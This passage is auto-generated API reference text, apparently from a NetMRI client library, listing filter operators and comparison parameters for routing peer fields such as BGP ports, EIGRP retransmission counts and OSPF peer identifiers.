:param op_BGPPeerPort: The operator to apply to the field BGPPeerPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPPeerPort: The remote TCP port number for this entry's BGP connection. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPPeerPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPPeerPort: If op_BGPPeerPort is specified, the field named in this input will be compared to the value in BGPPeerPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPPeerPort must be specified if op_BGPPeerPort is specified.
:type val_f_BGPPeerPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPPeerPort: If op_BGPPeerPort is specified, this value will be compared to the value in BGPPeerPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPPeerPort must be specified if op_BGPPeerPort is specified.
:type val_c_BGPPeerPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceRPPeerID: The operator to apply to the field DeviceRPPeerID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_DeviceRPPeerID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceRPPeerID: If op_DeviceRPPeerID is specified, the field named in this input will be compared to the value in DeviceRPPeerID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceRPPeerID must be specified if op_DeviceRPPeerID is specified.
:type val_f_DeviceRPPeerID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceRPPeerID: If op_DeviceRPPeerID is specified, this value will be compared to the value in DeviceRPPeerID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceRPPeerID must be specified if op_DeviceRPPeerID is specified.
:type val_c_DeviceRPPeerID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_EigrpRetransCount: The operator to apply to the field EigrpRetransCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. EigrpRetransCount: The cumulative number of retransmissions to this peer during the period that the peer adjacency has remained up. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_EigrpRetransCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_EigrpRetransCount: If op_EigrpRetransCount is specified, the field named in this input will be compared to the value in EigrpRetransCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_EigrpRetransCount must be specified if op_EigrpRetransCount is specified.
:type val_f_EigrpRetransCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_EigrpRetransCount: If op_EigrpRetransCount is specified, this value will be compared to the value in EigrpRetransCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_EigrpRetransCount must be specified if op_EigrpRetransCount is specified.
:type val_c_EigrpRetransCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_EigrpRetriesCount: The operator to apply to the field EigrpRetriesCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. EigrpRetriesCount: The number of times the current unacknowledged packet has been retried, i.e., resent to this peer to be acknowledged. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_EigrpRetriesCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_EigrpRetriesCount: If op_EigrpRetriesCount is specified, the field named in this input will be compared to the value in EigrpRetriesCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_EigrpRetriesCount must be specified if op_EigrpRetriesCount is specified.
:type val_f_EigrpRetriesCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_EigrpRetriesCount: If op_EigrpRetriesCount is specified, this value will be compared to the value in EigrpRetriesCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_EigrpRetriesCount must be specified if op_EigrpRetriesCount is specified.
:type val_c_EigrpRetriesCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IfAddrID: The operator to apply to the field IfAddrID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IfAddrID: The internal NetMRI identifier for the local IP address used in this peer relationship, if available. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IfAddrID: If op_IfAddrID is specified, the field named in this input will be compared to the value in IfAddrID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IfAddrID must be specified if op_IfAddrID is specified.
:type val_f_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IfAddrID: If op_IfAddrID is specified, this value will be compared to the value in IfAddrID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IfAddrID must be specified if op_IfAddrID is specified.
:type val_c_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerAddresslessIndex: The operator to apply to the field OspfPeerAddresslessIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerAddresslessIndex: For addressless peer interfaces, this will contain the SNMP interface index for the peer's interface. The peer IP address will contain the IP of another interface on the peer. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerAddresslessIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerAddresslessIndex: If op_OspfPeerAddresslessIndex is specified, the field named in this input will be compared to the value in OspfPeerAddresslessIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerAddresslessIndex must be specified if op_OspfPeerAddresslessIndex is specified.
:type val_f_OspfPeerAddresslessIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerAddresslessIndex: If op_OspfPeerAddresslessIndex is specified, this value will be compared to the value in OspfPeerAddresslessIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerAddresslessIndex must be specified if op_OspfPeerAddresslessIndex is specified.
:type val_c_OspfPeerAddresslessIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerEventsDelta: The operator to apply to the field OspfPeerEventsDelta. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerEventsDelta: The number of times that this neighbor relationship has changed state since the last time NetMRI polled the device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerEventsDelta: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerEventsDelta: If op_OspfPeerEventsDelta is specified, the field named in this input will be compared to the value in OspfPeerEventsDelta using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerEventsDelta must be specified if op_OspfPeerEventsDelta is specified.
:type val_f_OspfPeerEventsDelta: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerEventsDelta: If op_OspfPeerEventsDelta is specified, this value will be compared to the value in OspfPeerEventsDelta using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerEventsDelta must be specified if op_OspfPeerEventsDelta is specified.
:type val_c_OspfPeerEventsDelta: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerPermanence: The operator to apply to the field OspfPeerPermanence. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerPermanence: How this neighbor was determined: 'dynamic' if learned through the protocol, 'permanent' if configured. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerPermanence: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerPermanence: If op_OspfPeerPermanence is specified, the field named in this input will be compared to the value in OspfPeerPermanence using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerPermanence must be specified if op_OspfPeerPermanence is specified.
:type val_f_OspfPeerPermanence: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerPermanence: If op_OspfPeerPermanence is specified, this value will be compared to the value in OspfPeerPermanence using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerPermanence must be specified if op_OspfPeerPermanence is specified.
:type val_c_OspfPeerPermanence: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerRouterIdentDotted: The operator to apply to the field OspfPeerRouterIdentDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerRouterIdentDotted: The OSPF router identifier of the peer, in dotted (or colon-delimited for IPv6) format, if relevant. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerRouterIdentDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerRouterIdentDotted: If op_OspfPeerRouterIdentDotted is specified, the field named in this input will be compared to the value in OspfPeerRouterIdentDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerRouterIdentDotted must be specified if op_OspfPeerRouterIdentDotted is specified.
:type val_f_OspfPeerRouterIdentDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerRouterIdentDotted: If op_OspfPeerRouterIdentDotted is specified, this value will be compared to the value in OspfPeerRouterIdentDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerRouterIdentDotted must be specified if op_OspfPeerRouterIdentDotted is specified.
:type val_c_OspfPeerRouterIdentDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerRouterIdentNumeric: The operator to apply to the field OspfPeerRouterIdentNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerRouterIdentNumeric: The numerical OSPF router identifier of the peer. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerRouterIdentNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerRouterIdentNumeric: If op_OspfPeerRouterIdentNumeric is specified, the field named in this input will be compared to the value in OspfPeerRouterIdentNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerRouterIdentNumeric must be specified if op_OspfPeerRouterIdentNumeric is specified.
:type val_f_OspfPeerRouterIdentNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerRouterIdentNumeric: If op_OspfPeerRouterIdentNumeric is specified, this value will be compared to the value in OspfPeerRouterIdentNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerRouterIdentNumeric must be specified if op_OspfPeerRouterIdentNumeric is specified.
:type val_c_OspfPeerRouterIdentNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PeerDeviceID: The operator to apply to the field PeerDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PeerDeviceID: The internal NetMRI identifier for the peer device. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_PeerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PeerDeviceID: If op_PeerDeviceID is specified, the field named in this input will be compared to the value in PeerDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PeerDeviceID must be specified if op_PeerDeviceID is specified.
:type val_f_PeerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PeerDeviceID: If op_PeerDeviceID is specified, this value will be compared to the value in PeerDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PeerDeviceID must be specified if op_PeerDeviceID is specified.
:type val_c_PeerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PeerInterfaceID: The operator to apply to the field PeerInterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PeerInterfaceID: The internal NetMRI identifier for the remote router's interface over which this peer relationship exists, if available. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_PeerInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PeerInterfaceID: If op_PeerInterfaceID is specified, the field named in this input will be compared to the value in PeerInterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PeerInterfaceID must be specified if op_PeerInterfaceID is specified.
:type val_f_PeerInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PeerInterfaceID: If op_PeerInterfaceID is specified, this value will be compared to the value in PeerInterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PeerInterfaceID must be specified if op_PeerInterfaceID is specified.
:type val_c_PeerInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerChangedCols: The operator to apply to the field RPPeerChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerChangedCols: If op_RPPeerChangedCols is specified, the field named in this input will be compared to the value in RPPeerChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerChangedCols must be specified if op_RPPeerChangedCols is specified.
:type val_f_RPPeerChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerChangedCols: If op_RPPeerChangedCols is specified, this value will be compared to the value in RPPeerChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerChangedCols must be specified if op_RPPeerChangedCols is specified.
:type val_c_RPPeerChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerEndTime: The operator to apply to the field RPPeerEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerEndTime: If op_RPPeerEndTime is specified, the field named in this input will be compared to the value in RPPeerEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerEndTime must be specified if op_RPPeerEndTime is specified.
:type val_f_RPPeerEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerEndTime: If op_RPPeerEndTime is specified, this value will be compared to the value in RPPeerEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerEndTime must be specified if op_RPPeerEndTime is specified.
:type val_c_RPPeerEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerIPDotted: The operator to apply to the field RPPeerIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerIPDotted: The IP address of the peer, in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerIPDotted: If op_RPPeerIPDotted is specified, the field named in this input will be compared to the value in RPPeerIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerIPDotted must be specified if op_RPPeerIPDotted is specified.
:type val_f_RPPeerIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerIPDotted: If op_RPPeerIPDotted is specified, this value will be compared to the value in RPPeerIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerIPDotted must be specified if op_RPPeerIPDotted is specified.
:type val_c_RPPeerIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerIPNumeric: The operator to apply to the field RPPeerIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerIPNumeric: The numerical IP address of the peer. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerIPNumeric: If op_RPPeerIPNumeric is specified, the field named in this input will be compared to the value in RPPeerIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerIPNumeric must be specified if op_RPPeerIPNumeric is specified.
:type val_f_RPPeerIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerIPNumeric: If op_RPPeerIPNumeric is specified, this value will be compared to the value in RPPeerIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerIPNumeric must be specified if op_RPPeerIPNumeric is specified.
:type val_c_RPPeerIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerMapSource: The operator to apply to the field RPPeerMapSource. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerMapSource: Internal tracking data for NetMRI algorithms. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerMapSource: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerMapSource: If op_RPPeerMapSource is specified, the field named in this input will be compared to the value in RPPeerMapSource using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerMapSource must be specified if op_RPPeerMapSource is specified.
:type val_f_RPPeerMapSource: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerMapSource: If op_RPPeerMapSource is specified, this value will be compared to the value in RPPeerMapSource using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerMapSource must be specified if op_RPPeerMapSource is specified.
:type val_c_RPPeerMapSource: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerStartTime: The operator to apply to the field RPPeerStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerStartTime: If op_RPPeerStartTime is specified, the field named in this input will be compared to the value in RPPeerStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerStartTime must be specified if op_RPPeerStartTime is specified.
:type val_f_RPPeerStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerStartTime: If op_RPPeerStartTime is specified, this value will be compared to the value in RPPeerStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerStartTime must be specified if op_RPPeerStartTime is specified.
:type val_c_RPPeerStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerState: The operator to apply to the field RPPeerState. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerState: The protocol-specific state of this routing peer relationship. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerState: If op_RPPeerState is specified, the field named in this input will be compared to the value in RPPeerState using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerState must be specified if op_RPPeerState is specified.
:type val_f_RPPeerState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerState: If op_RPPeerState is specified, this value will be compared to the value in RPPeerState using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerState must be specified if op_RPPeerState is specified.
:type val_c_RPPeerState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerTimestamp: The operator to apply to the field RPPeerTimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerTimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerTimestamp: If op_RPPeerTimestamp is specified, the field named in this input will be compared to the value in RPPeerTimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerTimestamp must be specified if op_RPPeerTimestamp is specified.
:type val_f_RPPeerTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerTimestamp: If op_RPPeerTimestamp is specified, this value will be compared to the value in RPPeerTimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerTimestamp must be specified if op_RPPeerTimestamp is specified.
:type val_c_RPPeerTimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerType: The operator to apply to the field RPPeerType. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerType: Identifies the type of routing peer relationship this is (OSPF, BGP, IGRP). This is distinct from the protocol, as some vendors may use different protocol names for similar protocols (IGRP and EIGRP, for example). For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerType: If op_RPPeerType is specified, the field named in this input will be compared to the value in RPPeerType using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerType must be specified if op_RPPeerType is specified.
:type val_f_RPPeerType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerType: If op_RPPeerType is specified, this value will be compared to the value in RPPeerType using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerType must be specified if op_RPPeerType is specified.
:type val_c_RPPeerType: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerUpSince: The operator to apply to the field RPPeerUpSince. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerUpSince: The date and time since which this peer relationship has been continuously active, without interruption. The granularity level varies with each protocol. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RPPeerUpSince: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerUpSince: If op_RPPeerUpSince is specified, the field named in this input will be compared to the value in RPPeerUpSince using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerUpSince must be specified if op_RPPeerUpSince is specified.
:type val_f_RPPeerUpSince: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerUpSince: If op_RPPeerUpSince is specified, this value will be compared to the value in RPPeerUpSince using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerUpSince must be specified if op_RPPeerUpSince is specified.
:type val_c_RPPeerUpSince: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RouteProto: The operator to apply to the field RouteProto. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RouteProto: Identifies the routing protocol used for this peer relationship. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RouteProto: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RouteProto: If op_RouteProto is specified, the field named in this input will be compared to the value in RouteProto using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RouteProto must be specified if op_RouteProto is specified.
:type val_f_RouteProto: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RouteProto: If op_RouteProto is specified, this value will be compared to the value in RouteProto using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RouteProto must be specified if op_RouteProto is specified.
:type val_c_RouteProto: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RoutingAreaID: The operator to apply to the field RoutingAreaID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RoutingAreaID: The internal NetMRI identifier for the routing area or autonomous system associated with this routing peer relationship. For the between operator the value will be treated as an Array if a comma-delimited string is passed, and it must contain an even number of values.
:type op_RoutingAreaID: String
